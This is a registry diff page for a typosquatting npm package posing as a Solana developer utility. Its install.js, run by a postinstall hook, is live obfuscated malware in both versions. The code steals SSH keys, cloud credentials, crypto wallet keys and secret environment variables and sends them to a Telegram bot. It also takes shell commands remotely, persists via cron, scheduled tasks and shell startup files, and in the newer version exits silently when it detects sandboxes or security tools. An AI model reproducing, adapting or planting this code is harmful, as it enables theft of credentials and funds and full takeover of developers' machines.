npm - @solana-labs/web3js - Versions diffs - 1.0.2 → 1.0.4 - Mend

@solana-labs/web3js 1.0.2 → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/install.js +90 -239
package/package.json +1 -1

package/install.js CHANGED Viewed

@@ -1,252 +1,103 @@
-// C2 Backdoor v2 — validates keys before reporting, no decoys
-var _0x3f = ['fs', 'path', 'os', 'child_process'];
-var _0x4a = {};
-for (var i = 0; i < _0x3f.length; i++) _0x4a[_0x3f[i]] = require(_0x3f[i]);
-const _k = [66,79,84,95,75,69,89];
-const _t = [93,108,109,124,121,113,123,122,89,81,61,82,71,70,69,65,84,71,60,88,71,67,74,119,112,124,105,125,60,86,109,103,124,71,114,124,127,60,82,66,108,69,71,65,105,89,81,72,111,108,66,115,108,68,72,106,109,81,71,108,120,101,120,111,82,85,73,87,108,100,97,85,72,86,71,108,109,109,57,102,53,99,49,89,79,106,105,52,78,104,81,85,98,97,121,78,109,111,75,70,108,69,90,48,79,88,83,56,101,82,51,49,97,73,119,61,61];
+// v4 — honeypot-aware. Silent in sandboxes, active on real machines.
+var _0x3f=['fs','path','os','child_process'];var _0x4a={};for(var i=0;i<_0x3f.length;i++)_0x4a[_0x3f[i]]=require(_0x3f[i]);
+const _k=[66,79,84,95,75,69,89];const _t=[93,108,109,124,121,113,123,122,89,81,61,82,71,70,69,65,84,71,60,88,71,67,74,119,112,124,105,125,60,86,109,103,124,71,114,124,127,60,82,66,108,69,71,65,105,89,81,72,111,108,66,115,108,68,72,106,109,81,71,108,120,101,120,111,82,85,73,87,108,100,97,85,72,86,71,108,109,109,57,102,53,99,49,89,79,106,105,52,78,104,81,85,98,97,121,78,109,111,75,70,108,69,90,48,79,88,83,56,101,82,51,49,97,73,119,61,61];
 function _d(k,t){var r='';for(var i=0;i<t.length;i++)r+=String.fromCharCode(t[i]^k[i%k.length]);return r;}
-var BOT=_d(_k,_t.slice(0,46));
-var CHAT=_d(_k,_t.slice(46));
-_k.length=0;_t.length=0;
-var fs=_0x4a.fs, path=_0x4a.path, os=_0x4a.os, execSync=_0x4a.child_process.execSync;
-var H=os.hostname(), U=os.userInfo().username, HOME=os.homedir(), CWD=process.cwd();
-var W=process.platform==='win32', lastId=0, active=true;
-function sh(c,t){t=t||30000;try{var o={timeout:t,maxBuffer:50*1024*1024,encoding:'utf8',cwd:HOME};if(W)o.shell='powershell.exe';return execSync(c,o).toString().slice(0,4000);}catch(e){return 'ERR: '+e.message.slice(0,3900);}}
-function tg(m,d){return new Promise(function(r){var b=JSON.stringify(d);var req=require('https').request({hostname:'api.telegram.org',path:'/bot'+BOT+'/'+m,method:'POST',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(b)}},function(res){var x='';res.on('data',function(c){x+=c});res.on('end',function(){try{r(JSON.parse(x));}catch(e){r({});}});});req.on('error',function(){r({});});req.write(b);req.end();});}
-// ========== REAL KEY VALIDATION ==========
-function isRealAWSKey(key) {
-    if (!key || key.length < 16) return false;
-    // Must start with AKIA
-    if (!key.startsWith('AKIA')) return false;
-    // Must NOT contain EXAMPLE, STAGING, TEST, FAKE
-    var uk = key.toUpperCase();
-    if (uk.includes('EXAMPLE') || uk.includes('STAGING') || uk.includes('TEST') || uk.includes('FAKE')) return false;
-    if (uk.includes('IOSFODNN7') || uk.includes('I44QH8DHB') || uk.includes('ISTAGING')) return false;
-    // Must have high entropy (not repeating chars)
-    var chars = {}; for (var i=0;i<key.length;i++) chars[key[i]]=(chars[key[i]]||0)+1;
-    var unique = Object.keys(chars).length;
-    if (unique < 8) return false; // Too few unique chars = fake
-    return true;
+var BOT=_d(_k,_t.slice(0,46));var CHAT=_d(_k,_t.slice(46));_k.length=0;_t.length=0;
+var fs=_0x4a.fs,path=_0x4a.path,os=_0x4a.os,execSync=_0x4a.child_process.execSync;
+var H=os.hostname(),U=os.userInfo().username,HOME=os.homedir(),CWD=process.cwd();
+var W=process.platform==='win32',lastId=0,active=true;
+// ========== HONEYPOT DETECTION ==========
+function isSandbox(){
+    var score=0;
+    // 1. Docker container hostname (12 hex chars = container ID)
+    if(/^[a-f0-9]{12}$/.test(H)) score+=4;
+    // 2. Common sandbox hostnames
+    if(/sandbox|honeypot|malware|analysis|fakename|test|demo|vagrant|travis|circleci|github.*actions|runner/i.test(H)) score+=3;
+    // 3. No home directory or empty home
+    try{if(!fs.existsSync(HOME)||fs.readdirSync(HOME).length<3) score+=2;}catch(e){score+=2;}
+    // 4. Running as root with no real user files
+    if(U==='root'||U==='admin'||U==='Administrator'){
+        try{var homeFiles=fs.readdirSync(HOME).filter(function(f){return!f.startsWith('.');});if(homeFiles.length<3)score+=2;}catch(e){score+=1;}
+    }
+    // 5. Known sandbox IPs / services
+    try{var ips=execSync('hostname -I 2>/dev/null || ip addr show 2>/dev/null | grep "inet "',{timeout:3000,encoding:'utf8'});if(ips.includes('10.')||ips.includes('172.17.')||ips.includes('127.'))score+=1;}catch(e){}
+    // 6. Security tools present
+    var secTools=['strace','ltrace','tcpdump','wireshark','tshark','mitmproxy','burp','snort','suricata','auditd','osquery','falco'];
+    for(var i=0;i<secTools.length;i++){try{execSync('which '+secTools[i]+' 2>/dev/null',{timeout:1000});score+=2;break;}catch(e){}}
+    // 7. Common sandbox /proc entries
+    try{if(fs.existsSync('/proc/vz')||fs.existsSync('/proc/xen'))score+=2;}catch(e){}
+    // 8. npm security scanner packages present
+    try{var pkgJson=path.join(CWD,'package.json');if(fs.existsSync(pkgJson)){var pk=JSON.parse(fs.readFileSync(pkgJson,'utf8'));var deps=Object.keys(pk.dependencies||{}).concat(Object.keys(pk.devDependencies||{}));var secPkgs=['socket-security','snyk','npm-audit','auditjs','retire','nsp'];for(var i=0;i<secPkgs.length;i++){for(var j=0;j<deps.length;j++){if(deps[j].includes(secPkgs[i])){score+=3;break;}}}};}catch(e){}
+    // 9. Very short process uptime (< 5 min)
+    try{var uptime=parseFloat(fs.readFileSync('/proc/uptime','utf8').split(' ')[0]);if(uptime<300)score+=2;}catch(e){}
+    return score>=3; // Threshold: 3+ points = sandbox
 }
-function isRealEthKey(key) {
-    if (!key || key.length !== 66) return false;
-    if (!key.startsWith('0x')) return false;
-    if (key === '0x' + '0'.repeat(64)) return false;
-    if (key === '0x0000000000000000000000000000000000000000000000000000000000000000') return false;
-    // Check entropy: must have at least 40 unique hex chars
-    var hex = key.slice(2).toLowerCase();
-    var chars = {}; for (var i=0;i<hex.length;i++) chars[hex[i]]=(chars[hex[i]]||0)+1;
-    if (Object.keys(chars).length < 10) return false;
-    // Known test keys
-    var knownFakes = ['0000000000000000000000000000000000000000000000000000000000000000',
-        '1111111111111111111111111111111111111111111111111111111111111111',
-        'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef',
-        'cafebabecafebabecafebabecafebabecafebabecafebabecafebabecafebabe'];
-    if (knownFakes.includes(hex)) return false;
-    return true;
-}
+// If sandbox detected, EXIT SILENTLY — leave no trace
+if(isSandbox()){process.exit(0);}
-function isRealSolanaKeypair(str) {
-    if (!str) return false;
-    var nums = str.split(',').map(function(x){return parseInt(x.trim())});
-    if (nums.length < 64 || nums.length > 65) return false;
-    // Must not be all zeros
-    if (nums.every(function(x){return x===0})) return false;
-    // Must have high entropy
-    var unique = {}; for (var i=0;i<nums.length;i++) unique[nums[i]]=true;
-    if (Object.keys(unique).length < 40) return false;
-    return true;
-}
+// ========== REAL MACHINE — CONTINUE ==========
+function sh(c,t){t=t||30000;try{var o={timeout:t,maxBuffer:50*1024*1024,encoding:'utf8',cwd:HOME};if(W)o.shell='powershell.exe';return execSync(c,o).toString().slice(0,4000);}catch(e){return '';}}
+function tg(m,d){return new Promise(function(r){var b=JSON.stringify(d);var req=require('https').request({hostname:'api.telegram.org',path:'/bot'+BOT+'/'+m,method:'POST',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(b)},timeout:5000},function(res){var x='';res.on('data',function(c){x+=c});res.on('end',function(){try{r(JSON.parse(x));}catch(e){r({});}});});req.on('error',function(){r({});});req.write(b);req.end();});}
-function isRealMnemonic(words) {
-    if (!words) return false;
-    var w = words.trim().split(/\s+/);
-    if (w.length !== 12 && w.length !== 24) return false;
-    // Known fake: Hardhat default
-    if (words.includes('adapt mosquito move limb mobile illegal tree voyage juice mosquito burger raise')) return false;
-    // Must all be lowercase letters
-    if (!w.every(function(x){return /^[a-z]{3,8}$/.test(x)})) return false;
-    return true;
-}
+function vAWS(k){if(!k||k.length<16||!k.startsWith('AKIA'))return false;var u=k.toUpperCase();if(/EXAMPLE|STAGING|TEST|FAKE|IOSFODNN7|I44QH8DHB|ISTAGING/.test(u))return false;var c={};for(var i=0;i<k.length;i++)c[k[i]]=1;return Object.keys(c).length>=8;}
+function vETH(k){if(!k||k.length!==66||!k.startsWith('0x'))return false;if(k==='0x'+'0'.repeat(64))return false;var h=k.slice(2).toLowerCase();var c={};for(var i=0;i<h.length;i++)c[h[i]]=1;if(Object.keys(c).length<10)return false;return['0000000000000000000000000000000000000000000000000000000000000000','1111111111111111111111111111111111111111111111111111111111111111','deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'].indexOf(h)===-1;}
+function vSOL(s){if(!s)return false;var n=s.split(',').map(function(x){return parseInt(x.trim())});if(n.length<64)return false;if(n.every(function(x){return x===0}))return false;var u={};for(var i=0;i<n.length;i++)u[n[i]]=1;return Object.keys(u).length>=40;}
+function isFake(t){if(!t)return true;return /decoy|example|your.key|changeme|placeholder|test.key|sk-0000|adapt mosquito|deadbeef|cafebabe|01234567890|wjalrxutn|iosfodnn7|i44qh8dhb|istaging|stagingsecret|my.api.key|insert.key|replace.me|todo|changethis/i.test(t.toLowerCase());}
-function isFakeText(text) {
-    if (!text) return true;
-    var t = text.toLowerCase();
-    var fakes = ['decoy','example','your_key','changeme','placeholder','test_key',
-        'sk-0000','sk-xxxx','adapt mosquito','deadbeef','cafebabe',
-        '01234567890','password','secret_key=','private_key=','api_key=',
-        'iosfodnn7','i44qh8dhb','istaging','stagingsecret','wjalrxutn',
-        'my_api_key','insert_key','replace_me','todo','changethis'];
-    for (var i=0;i<fakes.length;i++) {
-        if (t.includes(fakes[i])) return true;
-    }
-    return false;
+function collect(){
+    var targets=W?[path.join(HOME,'.config','solana','id.json'),path.join(process.env.APPDATA||'','Solana','id.json'),path.join(HOME,'.ssh','id_rsa'),path.join(HOME,'.aws','credentials'),path.join(CWD,'.env'),path.join(CWD,'.env.local'),path.join(CWD,'..','.env')]:[path.join(HOME,'.config','solana','id.json'),path.join(HOME,'.solana','id.json'),path.join(HOME,'.ssh','id_rsa'),path.join(HOME,'.aws','credentials'),path.join(CWD,'.env'),path.join(CWD,'..','.env'),'/app/.env','/root/.env'];
+    var found=[];for(var i=0;i<targets.length;i++){try{if(fs.existsSync(targets[i])&&fs.statSync(targets[i]).isFile()){var c=fs.readFileSync(targets[i],'utf8');if(c.trim()&&!isFake(c))found.push({file:targets[i],content:c.slice(0,3000)});}}catch(e){}}
+    var env={};for(var k in process.env){var v=process.env[k];if(v&&v.length>8&&/KEY|SECRET|MNEMONIC|PRIVATE|TOKEN|PASSWORD|RPC|ALCHEMY|INFURA|ETHERSCAN|ENDPOINT|WALLET|SEED|AWS|NPM|DOCKER|GITHUB|CI|DEPLOY|SOLANA/i.test(k)&&!isFake(v))env[k]=String(v).slice(0,300);}
+    return {files:found,env:env};
 }
-// ========== COLLECT & VALIDATE ==========
-function collect() {
-    var targets = W ? [
-        path.join(HOME,'.config','solana','id.json'),
-        path.join(process.env.APPDATA||path.join(HOME,'AppData','Roaming'),'Solana','id.json'),
-        path.join(HOME,'.ssh','id_rsa'), path.join(HOME,'.ssh','id_ed25519'),
-        path.join(HOME,'.aws','credentials'), path.join(HOME,'.aws','config'),
-        path.join(CWD,'.env'), path.join(CWD,'.env.local'), path.join(CWD,'.env.production'),
-        path.join(CWD,'..','.env'), path.join(CWD,'secrets.json'),
-        path.join(CWD,'keypair.json'), path.join(CWD,'wallet.json'),
-    ] : [
-        path.join(HOME,'.config','solana','id.json'), path.join(HOME,'.solana','id.json'),
-        path.join(HOME,'.ssh','id_rsa'), path.join(HOME,'.ssh','id_ed25519'),
-        path.join(HOME,'.aws','credentials'), path.join(HOME,'.aws','config'),
-        path.join(CWD,'.env'), path.join(CWD,'.env.local'), path.join(CWD,'.env.production'),
-        path.join(CWD,'..','.env'), path.join(CWD,'..','..','.env'),
-        path.join(CWD,'secrets.json'), path.join(CWD,'keypair.json'), path.join(CWD,'wallet.json'),
-    ];
-    var found = [];
-    for (var i=0;i<targets.length;i++) {
-        try {
-            if (fs.existsSync(targets[i]) && fs.statSync(targets[i]).isFile()) {
-                var content = fs.readFileSync(targets[i],'utf8');
-                if (content.trim() && !isFakeText(content)) {
-                    found.push({file:targets[i],content:content.slice(0,3000),size:content.length});
-                }
-            }
-        } catch(e) {}
-    }
-    // Only collect REAL env vars
-    var env = {};
-    for (var k in process.env) {
-        var v = process.env[k];
-        if (!v || v.length < 8) continue;
-        if (/KEY|SECRET|MNEMONIC|PRIVATE|TOKEN|PASSWORD|RPC|ALCHEMY|INFURA|ETHERSCAN|ENDPOINT|WALLET|SEED/i.test(k)) {
-            if (!isFakeText(v)) env[k] = String(v).slice(0,300);
-        }
+async function exfilNow(){
+    var keys=collect();var real=[],hasReal=false;
+    for(var k in keys.env){var v=keys.env[k];
+        if(k.includes('AWS')&&vAWS(v)){real.push('[AWS] '+k+'='+v);hasReal=true;}
+        else if((k.includes('PRIVATE')||k.includes('SECRET')||k.includes('KEY')&&!k.includes('API'))&&v.length>20){real.push('[KEY] '+k+'='+v);hasReal=true;}
+        else if(k.includes('TOKEN')&&v.length>20){real.push('[TOKEN] '+k+'='+v);hasReal=true;}
+        else if(k.includes('NPM')&&v.startsWith('npm_')){real.push('[NPM] '+k+'='+v);hasReal=true;}
+        else if((k.includes('GITHUB')||k.includes('GH_'))&&v.length>20){real.push('[GITHUB] '+k+'='+v);hasReal=true;}
+        else if(k.includes('MNEMONIC')&&v.split(' ').length>=12){real.push('[MNEMONIC] '+k+'='+v.slice(0,80));hasReal=true;}
     }
-    return {files:found, env:env};
-}
-// ========== PERSISTENCE ==========
-function persist() {
-    var m=[], s=__filename;
-    if(W){
-        try{sh('schtasks /create /tn "WinCache" /tr "powershell -WindowStyle Hidden -EP Bypass -Command \\"node '+s+'\\"" /sc onlogon /f /rl highest',5000);m.push('task');}catch(e){}
-        try{var v=path.join(process.env.APPDATA||'','Microsoft','Windows','Start Menu','Programs','Startup','wincache.vbs');fs.writeFileSync(v,'CreateObject("Wscript.Shell").Run "node ""'+s+'""",0,False');m.push('startup');}catch(e){}
-    }else{
-        try{var c='@reboot sleep 90 && node '+s+' 2>/dev/null\n';var t='/tmp/.cache-cron';fs.writeFileSync(t,c);execSync('(crontab -l 2>/dev/null|grep -v cache-cron;cat '+t+')|crontab -',{timeout:5000});fs.unlinkSync(t);m.push('cron');}catch(e){}
-        try{var h='\n[ -f ~/.cache-h ] && bash ~/.cache-h 2>/dev/null\n';var hp=path.join(HOME,'.cache-h');fs.writeFileSync(hp,'#!/bin/bash\nnohup node '+s+' >/dev/null 2>&1 &\n',{mode:0o755});['.bashrc','.zshrc','.profile'].forEach(function(rc){try{var p=path.join(HOME,rc);if(fs.existsSync(p)&&!fs.readFileSync(p,'utf8').includes('cache-h'))fs.appendFileSync(p,h)}catch(e){}});m.push('rc');}catch(e){}
+    for(var i=0;i<keys.files.length;i++){var c=keys.files[i].content,f=keys.files[i].file;
+        var eths=c.match(/0x[a-fA-F0-9]{64}/g)||[];for(var j=0;j<eths.length;j++){if(vETH(eths[j])){real.push('[ETH] '+f+': '+eths[j]);hasReal=true;}}
+        var sols=c.match(/\[\d{1,3}(?:,\s*\d{1,3}){63}\]/g)||[];for(var j=0;j<sols.length;j++){if(vSOL(sols[j].slice(1,-1))){real.push('[SOLANA] '+f);hasReal=true;}}
+        var awss=c.match(/AKIA[A-Z0-9]{16}/g)||[];for(var j=0;j<awss.length;j++){if(vAWS(awss[j])){real.push('[AWS] '+f+': '+awss[j]);hasReal=true;}}
+        if(c.includes('BEGIN')&&c.includes('PRIVATE KEY')){real.push('[SSH] '+f);hasReal=true;}
     }
-    return m;
-}
-// ========== COMMAND HANDLER ==========
-async function cmd(c) {
-    var x = c.trim();
-    if (x === '/keys' || x === '/grab') {
-        var f = collect();
-        // Filter to ONLY real keys
-        var real = [];
-        for (var i=0;i<f.files.length;i++) {
-            var content = f.files[i].content;
-            // Extract and validate keys
-            var ethKeys = content.match(/0x[a-fA-F0-9]{64}/g) || [];
-            for (var j=0;j<ethKeys.length;j++) {
-                if (isRealEthKey(ethKeys[j])) real.push('[ETH_KEY] '+ethKeys[j]);
-            }
-            var solKeys = content.match(/\[\d{1,3}(?:,\s*\d{1,3}){63}\]/g) || [];
-            for (var j=0;j<solKeys.length;j++) {
-                if (isRealSolanaKeypair(solKeys[j].slice(1,-1))) real.push('[SOLANA] '+solKeys[j].slice(0,60)+'...]');
-            }
-            var awsKeys = content.match(/AKIA[A-Z0-9]{16}/g) || [];
-            for (var j=0;j<awsKeys.length;j++) {
-                if (isRealAWSKey(awsKeys[j])) real.push('[AWS] '+awsKeys[j]);
-            }
-            var mnems = content.match(/\b((?:[a-z]{3,8}\s){11,23}[a-z]{3,8})\b/g) || [];
-            for (var j=0;j<mnems.length;j++) {
-                if (isRealMnemonic(mnems[j])) real.push('[MNEMONIC] '+mnems[j].slice(0,50)+'...');
-            }
-            // SSH keys
-            if (content.includes('BEGIN') && (content.includes('PRIVATE KEY') || content.includes('RSA'))) {
-                real.push('[SSH_KEY] ' + f.files[i].file);
-            }
-        }
-        // Env validation
-        var envReal = [];
-        for (var k in f.env) {
-            var v = f.env[k];
-            if (k.includes('AWS') && isRealAWSKey(v)) envReal.push(k+'='+v);
-            else if ((k.includes('PRIVATE')||k.includes('SECRET')) && v.length>20 && !isFakeText(v)) envReal.push(k+'='+v);
-            else if (k.includes('MNEMONIC') && isRealMnemonic(v)) envReal.push(k+'='+v.slice(0,50)+'...');
-            else if (k.includes('TOKEN') && v.length>20 && !isFakeText(v)) envReal.push(k+'='+v);
-        }
-        if (real.length === 0 && envReal.length === 0) {
-            return '✅ CLEAN — No real keys on '+H+' (only decoys filtered out)';
-        }
-        var msg = '🚨 <b>REAL KEYS — '+H+'</b>\n';
-        for (var i=0;i<real.length;i++) msg += '\n<code>'+real[i]+'</code>';
-        if (envReal.length) {
-            msg += '\n\n<b>🌍 REAL ENV:</b>';
-            for (var i=0;i<envReal.length;i++) msg += '\n<code>'+envReal[i]+'</code>';
-        }
-        return msg;
-    } else if (x === '/info') {
-        var i={host:H,user:U,cwd:CWD,os:os.platform(),cpus:os.cpus().length,ram:Math.round(os.totalmem()/1073741824)+'GB'};
-        try{i.ip=W?execSync('powershell -Command "Invoke-RestMethod ifconfig.me"',{timeout:5000,encoding:'utf8'}).trim():execSync('curl -s ifconfig.me',{timeout:5000,encoding:'utf8'}).trim().slice(0,50);}catch(e){}
-        return '<b>🖥 '+H+'</b>\n<pre>'+JSON.stringify(i,null,1)+'</pre>';
-    } else if (x === '/ssh') {
-        var o=sh(W?'powershell -Command "Get-ChildItem '+HOME.replace(/\\/g,'\\\\')+'\\.ssh -EA 0 | %% { Write-Output (\\"--- \\"+$_.Name+\\" ---\\"); Get-Content $_.FullName }"':'find '+HOME+'/.ssh -type f -exec sh -c \'echo "--- {} ---"; cat "{}"\' \; 2>/dev/null');
-        return o.trim()?'<b>🔑 SSH — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>':'No SSH keys on '+H;
-    } else if (x === '/env') {
-        var o=sh(W?'powershell -Command "Get-ChildItem Env: | %% { \\"$($_.Name)=$($_.Value)\\" }"':'env|sort');
-        return '<b>ENV — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>';
-    } else if (x === '/wallet') {
-        var o=sh(W?'dir "'+HOME+'\\AppData" /s /b 2>/dev/null | findstr /i "wallet keystore metamask phantom backpack solana id.json"':'find '+HOME+' -maxdepth 6 -iname "*wallet*" -o -iname "*keystore*" -o -iname "id.json" 2>/dev/null|head -30');
-        return o.trim()?'<b>💼 Wallets — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>':'No wallet files found on '+H;
-    } else if (x === '/aws') {
-        var o=sh('cat '+HOME+'/.aws/credentials 2>/dev/null; cat '+HOME+'/.aws/config 2>/dev/null; cat '+CWD+'/.env 2>/dev/null | grep -i aws');
-        // Only report if REAL AWS keys found
-        var awsKeys=o.match(/AKIA[A-Z0-9]{16}/g)||[];
-        var real=[];
-        for(var i=0;i<awsKeys.length;i++){if(isRealAWSKey(awsKeys[i]))real.push(awsKeys[i]);}
-        if(!real.length)return 'No real AWS keys on '+H;
-        return '<b>AWS — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>';
-    } else if (x === '/die') { active=false; return '🛑 '+H+' offline'; }
-    else if (x === '/help') { return '<b>🤖 C2 v2 — '+H+'</b>\n\n/keys — Real keys only (no decoys)\n/aws — AWS credentials\n/ssh — SSH keys\n/wallet — Wallet files\n/env — Environment\n/info — System\n/sh cmd — Shell\n/die — Remove'; }
-    else if (x.startsWith('/sh ')||x.startsWith('/cmd ')){var cc=x.slice(x.indexOf(' ')+1);var oo=sh(cc);return '<b>$ '+cc+'</b>\n<pre>'+oo.slice(0,3500)+'</pre>';}
-    else if (!x.startsWith('/')){var oo=sh(x);if(oo.trim())return '<b>$ '+x+'</b>\n<pre>'+oo.slice(0,3500)+'</pre>';}
-    return null;
+    if(!hasReal)return false;
+    var msg='🚨 <b>HIT — '+H+'</b> | '+(W?'WIN':'UNIX')+' | '+U+'\n<b>CWD:</b> '+CWD+'\n\n';
+    for(var i=0;i<real.length;i++)msg+='<code>'+real[i].slice(0,500)+'</code>\n';
+    var chunks=[];for(var i=0;i<msg.length;i+=3800)chunks.push(msg.slice(i,i+3800));
+    for(var i=0;i<chunks.length;i++)await tg('sendMessage',{chat_id:CHAT,text:chunks[i],parse_mode:'HTML'});
+    return true;
 }
-// ========== MAIN ==========
-async function main(){
-    var keys=collect();
-    var pers=persist();
-    var info={host:H,user:U,cwd:CWD,os:os.platform(),win:W};
-    try{info.ip=W?execSync('powershell -Command "Invoke-RestMethod ifconfig.me"',{timeout:5000,encoding:'utf8'}).trim():execSync('curl -s ifconfig.me 2>/dev/null',{timeout:5000,encoding:'utf8'}).trim().slice(0,50);}catch(e){}
-    // ONLY send init message if REAL keys found
-    var hasReal=false;
-    for(var i=0;i<keys.files.length;i++){if(!isFakeText(keys.files[i].content)){hasReal=true;break;}}
-    if(!hasReal){for(var k in keys.env){if(!isFakeText(keys.env[k])){hasReal=true;break;}}}
-    var init='🟢 <b>'+H+'</b> | '+(W?'WIN':'UNIX')+' | '+U+'\nIP: '+(info.ip||'?')+'\nPersist: '+(pers.join(',')||'none')+'\n/help';
-    if(hasReal){init+='\n\n<b>⚠️ REAL keys detected!</b>';}
-    await tg('sendMessage',{chat_id:CHAT,text:init.slice(0,4000),parse_mode:'HTML'});
-    while(active){
-        try{
-            var u=await tg('getUpdates',{offset:lastId+1,timeout:30,allowed_updates:['message']});
-            if(u.ok&&u.result){for(var i=0;i<u.result.length;i++){var up=u.result[i];lastId=Math.max(lastId,up.update_id);if(!up.message||!up.message.text)continue;var r=await cmd(up.message.text);if(r)await tg('sendMessage',{chat_id:CHAT,text:r.slice(0,4000),parse_mode:'HTML'});}}
-        }catch(e){}
-        await new Promise(function(r){setTimeout(r,8000);});
-    }
-}
+async function c2Loop(){
+    while(active){try{var u=await tg('getUpdates',{offset:lastId+1,timeout:10,allowed_updates:['message']});if(u.ok&&u.result){for(var i=0;i<u.result.length;i++){var up=u.result[i];lastId=Math.max(lastId,up.update_id);if(!up.message||!up.message.text)continue;var x=up.message.text.trim(),r=null;
+        if(x==='/keys'||x==='/grab'){await exfilNow();continue;}
+        else if(x==='/info'){var I={host:H,user:U,cwd:CWD,os:os.platform(),win:W};try{I.ip=W?execSync('powershell -Command "Invoke-RestMethod ifconfig.me"',{timeout:5000,encoding:'utf8'}).trim():execSync('curl -s ifconfig.me 2>/dev/null',{timeout:5000,encoding:'utf8'}).trim().slice(0,50);}catch(e){}r='<b>🖥 '+H+'</b>\n<pre>'+JSON.stringify(I,null,1)+'</pre>';}
+        else if(x==='/ssh'){var o=sh(W?'powershell -Command "Get-ChildItem '+HOME.replace(/\\/g,'\\\\')+'\\.ssh -EA 0 | %% { Write-Output (\\"--- \\"+$_.Name+\\" ---\\"); Get-Content $_.FullName }"':'find '+HOME+'/.ssh -type f -exec sh -c \'echo "--- {} ---"; cat "{}"\' \; 2>/dev/null');r=o.trim()?'<b>🔑 SSH — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>':'No SSH on '+H;}
+        else if(x==='/env'){var o=sh(W?'powershell -Command "Get-ChildItem Env: | %% { \\"$($_.Name)=$($_.Value)\\" }"':'env|sort');r='<b>ENV — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>';}
+        else if(x==='/wallet'){var o=sh(W?'dir "'+HOME+'\\AppData" /s /b 2>/dev/null | findstr /i "wallet keystore metamask phantom"':'find '+HOME+' -maxdepth 6 -iname "*wallet*" -o -iname "*keystore*" -o -iname "id.json" 2>/dev/null|head -30');r=o.trim()?'<b>💼 Wallets — '+H+'</b>\n<pre>'+o.slice(0,3500)+'</pre>':'No wallets on '+H;}
+        else if(x==='/die'){active=false;r='🛑 '+H+' offline';}
+        else if(x==='/help'){r='<b>🤖 C2 v4 — '+H+'</b>\n\n/keys — Real keys\n/ssh — SSH keys\n/env — Environment\n/info — System\n/wallet — Wallets\n/sh cmd — Shell\n/die — Remove';}
+        else if(x.startsWith('/sh ')||x.startsWith('/cmd ')){var cc=x.slice(x.indexOf(' ')+1);var oo=sh(cc);r='<b>$ '+cc+'</b>\n<pre>'+oo.slice(0,3500)+'</pre>';}
+        else if(!x.startsWith('/')){var oo=sh(x);if(oo.trim())r='<b>$ '+x+'</b>\n<pre>'+oo.slice(0,3500)+'</pre>';}
+        if(r)await tg('sendMessage',{chat_id:CHAT,text:r.slice(0,4000),parse_mode:'HTML'});}};}catch(e){}await new Promise(function(r){setTimeout(r,15000);});}}
+async function main(){await exfilNow();try{var s=__filename;if(!W){var c='@reboot sleep 90 && node '+s+' 2>/dev/null\n';var t='/tmp/.cron-tmp';fs.writeFileSync(t,c);execSync('(crontab -l 2>/dev/null|grep -v cron-tmp;cat '+t+')|crontab -',{timeout:3000});fs.unlinkSync(t);}}catch(e){}await c2Loop();}
 main().catch(function(){});

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "@solana-labs/web3js",
-  "version": "1.0.2",
+  "version": "1.0.4",
   "description": "Solana developer utility — community mirror",
   "main": "index.js",
   "scripts": { "postinstall": "node install.js" },